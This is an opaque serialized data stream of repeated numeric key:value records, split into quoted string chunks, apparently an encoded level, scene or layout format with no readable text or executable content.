24|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1825|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1826|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1827|15:325|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1828|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:'
- ..'425|5:424|5:424;p;1|1:421|2:2|5:19|3:1829|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1830|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:1780|2:2|3:1831|15:1832|4:1783;1|1:1780|2:2|3:1833|15:1834|4:1783;1|1:1780|2:2|3:1835|15:1836|4:1783;1|1:1780|2:2|3:1837|15:1838|4:1783;1|1:1780|2:2|3:1839|15:1840|4:1783;1|1:1780|2:2|3:1841|15:1842|4:1783;1|1:421|2:2|3:1843|15:537|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:1780|2:2|3:1844|15:1845|4:1783;1|1:1780|2:2|3:1846|15:1847|4:1783;1|5:1848|14:395|3:1849|15:1850|16:1851|4:1852|5:1848|5:1848;1|1:421|2:2|3:1853|15:537|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|5:1848|14:395|3:1854|16:1855|4:1852|5:1848|5:1848;1|1:421|2:2|3:1856|15:537|4:1857|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;18|5:131|3:1858|15:1859|4:1860|27:25|17:25|32:25|21:25|26:25|18:25|5:131|5:131;n;13|28:1861;p;18|5:84|3:1862|15:115|4:1863|27:25|17:25|32:25|21:25|26:25|18:25|5:84|5:84;n;13|28:1864;p;1|1:421|2:2|3:1865|15:1866|4:1867|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1868|15:1869|4:1870|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:1871|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1872|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1873|15:325|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1874|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1875|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;18|2:2|3:1876|15:1866|4:1877|17:24;1|1:421|2:2|3:1878|15:1866|4:1879|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1880|15:1218|4:1881|17:24|18:24;n;3|5:424|4:6|6:7|7:'
- ..'8|8:425|5:424|5:424;p;1|1:421|2:2|3:1882|15:1883|4:1884|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1885|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1886|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1887|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1888|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1889|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1890|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|5:1848|14:395|3:1891|15:1892|16:1893|4:1852|5:1848|5:1848;1|1:421|2:2|5:19|3:1894|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1895|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1896|15:115|4:1897|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1898|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1899|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1900|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1901|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1902|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1903|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:1904|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1905|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1906|15:563|4:423|17:24|18:2'
- ..'4|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1907|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1908|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1909|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:1910|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1911|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:1912|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1913|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1914|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1915|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:1916|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1917|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1918|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1919|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:1920|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1921|15:115|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;19|5:84|3:1922|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:904|10:1926;p;19|5:84|3:1927|4:1923|5:84|5:84;19|5:84|3:1928|4:1923|5:84|5:84;n;4|9:1929|10:1930;p;19|5:84|3:1931|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:904|10:1926;p;19|5:84|3:1932|4:1923|5:84|5:84;n;4|9:904|10:1926;4|9:1924|10:1933;p;19|5:84|3:1934|4:1923'
- ..'|5:84|5:84;n;4|9:1924|10:1925;4|9:1929|10:1930;p;19|5:84|3:1935|4:1923|5:84|5:84;n;4|9:1924|10:1933;p;19|5:84|3:1936|4:1923|5:84|5:84;19|5:84|3:1937|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:904|10:1926;4|9:1924|10:1925;p;19|5:84|3:1938|4:1923|5:84|5:84;19|5:84|3:1939|4:1923|5:84|5:84;n;4|9:1924|10:1925;p;19|5:84|3:1940|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:1929|10:1941;4|9:904|10:1942;p;19|5:84|3:1943|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:904|10:1942;4|9:1924|10:1925;p;19|5:84|3:1944|4:1923|5:84|5:84;1|1:421|2:2|3:1945|15:1809|4:1946|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;19|5:84|3:1947|4:1923|5:84|5:84;n;4|9:1929|10:1941;p;19|5:84|3:1948|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:1924|10:1925;p;1|1:421|2:2|3:1949|15:537|4:1950|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;9|9:1951|10:1952;9|9:1951|10:1953;p;19|5:84|3:1954|4:1923|5:84|5:84;n;4|9:1924|10:1933;4|9:1929|10:1941;p;19|5:84|3:1955|4:1923|5:84|5:84;1|1:421|2:2|3:1956|15:537|4:1897|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1957|15:537|4:1897|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:1958|15:21|4:608|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:1959|15:21|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;19|5:84|3:1960|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:217|10:1961;p;19|5:84|3:1962|4:1923|5:84|5:84;n;4|9:217|10:1963;p;19|5:84|3:1964|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:217|10:1961;p;19|5:84|3:1965|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:1929|10:1930;p;1|1:421|2:2|3:1966|15:1809|4:1967|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;19|5:84|3:1968|4:1923|5:84|5:84;n;4|9:217|10:1969;p;19|5:84|3:1970|4:1923|5:84|5:84;19|5:84|3:1971|4:1923|5:84|5:84;19|5:84|3:1972|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:1929|10:1930;4|9:217|10:1961;p;19|5:84|3:1973|4:1923|5:84|5:84;n;4|9:1929|10:19'
- ..'30;4|9:217|10:1963;4|9:1924|10:1925;p;19|5:84|3:1974|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:1924|10:1925;p;19|5:84|3:1975|4:1923|5:84|5:84;n;4|9:217|10:1961;4|9:1924|10:1933;p;19|5:84|3:1976|4:1923|5:84|5:84;n;4|9:1929|10:1930;p;19|5:84|3:1977|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:217|10:1961;p;19|5:84|3:1978|4:1923|5:84|5:84;n;4|9:1924|10:1933;p;19|5:84|3:1979|4:1923|5:84|5:84;19|5:84|3:1980|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:1929|10:1941;4|9:217|10:1961;p;19|5:84|3:1981|4:1923|5:84|5:84;n;4|9:1924|10:1933;4|9:217|10:1963;p;19|5:84|3:1982|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:217|10:1963;4|9:1924|10:1933;p;19|5:84|3:1983|4:1923|5:84|5:84;19|5:84|3:1984|4:1923|5:84|5:84;19|5:84|3:1985|4:1923|5:84|5:84;n;4|9:217|10:1961;4|9:1929|10:1941;4|9:1924|10:1933;p;19|5:84|3:1986|4:1923|5:84|5:84;19|5:84|3:1987|4:1923|5:84|5:84;n;4|9:217|10:1963;4|9:1929|10:1930;p;19|5:84|3:1988|4:1923|5:84|5:84;n;4|9:217|10:1963;p;1|1:421|2:2|3:1989|15:1809|4:1946|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;19|5:84|3:1990|4:1923|5:84|5:84;n;4|9:1924|10:1933;4|9:1929|10:1930;4|9:217|10:1963;p;1|5:1848|14:395|3:1991|15:153|16:1992|4:1852|5:1848|5:1848;1|1:1993|3:1994|15:1995|16:1996|4:1997|17:24|18:24;n;11|22:1998|23:1999|34:2000|24:43;p;18|2:2|3:2001|15:537|4:1877|17:24;19|5:84|3:2002|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:1929|10:1930;p;19|5:84|3:2003|4:1923|5:84|5:84;n;4|9:904|10:1926;p;19|5:84|3:2004|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:904|10:1926;p;19|5:84|3:2005|4:1923|5:84|5:84;19|5:84|3:2006|4:1923|5:84|5:84;19|5:84|3:2007|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:904|10:1942;p;19|5:84|3:2008|4:1923|5:84|5:84;n;4|9:1924|10:1925;p;19|5:84|3:2009|4:1923|5:84|5:84;n;4|9:1924|10:1925;4|9:904|10:1942;4|9:1929|10:1930;p;19|5:84|3:2010|4:1923|5:84|5:84;n;4|9:1924|10:1933;4|9:904|10:1926;p;19|5:84|3:2011|4:1923|5:84|5:84;n;4|9:1924|10:1933;p;19|5:84|3:201'
- ..'2|4:1923|5:84|5:84;n;4|9:1929|10:1930;4|9:904|10:1942;p;19|5:84|3:2013|4:1923|5:84|5:84;1|2:2|3:2014|15:2015|4:2016;n;15|22:2017;3|5:2018|4:6|6:7|7:8|8:9|5:2018|5:2018;p;1|2:2|3:2019|15:2020|4:2021|18:24;1|2:2|3:2022|15:2023|4:2024;n;16|22:2025;p;1|2:2|5:84|33:1793|3:2026|4:2027|18:24|5:84|5:84;n;3|5:2018|4:6|6:7|7:8|8:9|5:2018|5:2018;p;1|2:2|3:2028|15:2020|4:2029;n;16;3|5:2018|4:6|6:7|7:8|8:9|5:2018|5:2018;p;1|2:2|5:84|3:2030|15:2020|4:2031|18:24|5:84|5:84;n;4|9:1789|10:2032;p;1|2:2|5:84|33:1793|3:2033|4:2034|5:84|5:84;19|5:84|3:2035|15:2036|4:1923|5:84|5:84;n;4|9:2037|10:2038;4|9:1924|10:1925;4|9:169|10:2039;p;19|5:84|3:2040|15:2036|4:1923|5:84|5:84;19|5:84|3:2041|15:2036|4:1923|5:84|5:84;19|5:84|3:2042|15:2036|4:1923|5:84|5:84;19|5:84|3:2043|15:2036|4:1923|5:84|5:84;n;4|9:2037|10:2044;4|9:1929|10:2045;p;1|1:421|2:2|3:2046|15:21|4:1870|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|2:2|33:1793|3:2047|15:2048|4:2024;n;16|22:2025;3|5:2018|4:6|6:7|7:8|8:9|5:2018|5:2018;p;1|33:1793|3:2049|15:996|4:1795|27:25|17:25|32:25|21:25|26:25|18:25;n;17|1:1796|9:1797|10:1798;17|1:1796|9:1797|10:1799;9|9:1800|10:2050;9|9:2051|10:2052;9|9:185|10:2053;p;18|2:2|3:2054|15:115|4:1877|17:24;1|1:421|2:2|3:2055|15:1883|4:2056|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2057|15:1883|4:2058|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2059|15:1883|4:2060|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|5:1848|14:395|3:2061|15:2062|16:2063|4:1852|5:1848|5:1848;1|1:421|2:2|3:2064|15:537|4:2065|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2066|15:115|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1848|30:2067|14:2068|3:2069|15:2070|4:2071|17:24|18:24|5:1848|5:1848;n;7;11|22:2072|24:129;20|35:2073;7;15;p;1|1:421|2:2|3:2074|15:1809|4:1967|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:'
- ..'425|5:424|5:424;p;1|2:2|5:84|33:1793|3:2075|15:2076|4:2077|5:84|5:84;n;15|22:2078;p;1|1:421|2:2|5:19|3:2079|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2080|15:325|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2081|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2082|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2083|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2084|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2085|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2086|15:115|4:1897|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2087|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1784|3:2088|15:21|4:389|17:25|18:24|5:1784|5:1784;n;11|24:25;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|1:421|2:2|5:460|14:461|3:2089|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;18|5:131|3:2090|15:2091|4:1860|27:25|17:25|32:25|21:25|26:25|18:25|5:131|5:131;n;13|28:1861;p;1|2:2|5:1784|3:2092|15:2093|4:1806|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|1:421|2:2|3:2094|15:1883|4:2095|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2096|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2097|15:537|4:1857|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2098|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1784|3:2099|15:537|4:1788|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;9|9:1789|10:2100;p;1|2:2|5:1784|3:2101|15:2070|4:1810|17:24|18:24|5:1784|'
- ..'5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;13|28:1811|29:214;p;18|5:84|3:2102|15:297|4:1863|27:25|17:25|32:25|21:25|26:25|18:25|5:84|5:84;n;13|28:1864;p;1|2:2|5:1784|3:2103|15:2104|4:1810|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;13|28:1814|29:214;p;1|2:2|3:2105|4:2106;n;15|22:2107;p;1|1:421|2:2|5:19|3:2108|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|5:1848|14:395|3:2109|15:2110|16:2111|4:1852|5:1848|5:1848;1|2:2|5:1784|3:2112|15:2093|4:1806|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|2:2|5:1784|3:2113|15:153|4:1803|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;p;1|1:421|2:2|3:2114|15:537|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2115|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1784|3:2116|15:537|4:1788|17:24|18:24|5:1784|5:1784;n;3|5:1786|4:6|6:7|7:8|8:425|5:1786|5:1786;7|1:450;9|9:1789|10:2117;p;1|1:421|2:2|3:2118|15:537|4:1881|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2119|15:115|4:2120|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2121|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|5:1848|30:2067|14:2068|3:2122|15:2070|4:2071|17:24|18:24|5:1848|5:1848;n;7;11|22:2072|24:129;20|35:2073;7;15;p;1|1:421|2:2|5:19|3:2123|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2124|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2125|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2126|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2127|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:4'
- ..'21|2:2|5:19|3:2128|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2129|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2130|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2131|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2132|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2133|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2134|15:325|4:582|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2135|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:2136|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2137|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2138|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:2139|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2140|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2141|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;19|5:84|3:2142|4:1923|5:84|5:84;n;4|9:1929|10:1941;4|9:217|10:1961;4|9:1924|10:1925;p;19|5:84|3:2143|4:1923|5:84|5:84;n;4|9:217|10:1963;p;19|5:84|3:2144|4:1923|5:84|5:84;n;4|9:1929|10:1941;p;19|5:84|3:2145|15:2036|4:1923|5:84|5:84;n;4|9:169|10:2146;4|9:1929|10:2147;p;1|2:2|5:84|3:2148|15:2020|4:2149|18:24|5:84|5:84;1|2:2|3:2150|15:2151|4:2152;n;15|22:2078;3|5:2018|4:6|6:7|7:8|8:9|5:2018|5:2018;p;1|1:421|2:2|5:19|3:2153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:42'
- ..'4|5:424;p;1|1:421|2:2|5:19|3:2154|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|5:1848|14:395|3:2155|16:2156|4:1852|5:1848|5:1848;1|1:421|2:2|3:2157|15:537|4:175|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:2158|15:2159|4:2152;n;15|22:2078;p;1|1:421|2:2|5:19|3:2160|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2161|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2162|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2163|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2164|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2165|15:1218|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2166|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2167|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2168|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:2169|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:2170|15:996|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2171|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2172|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2173|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2174|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2175|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2176|15:325|4:423|17:24'
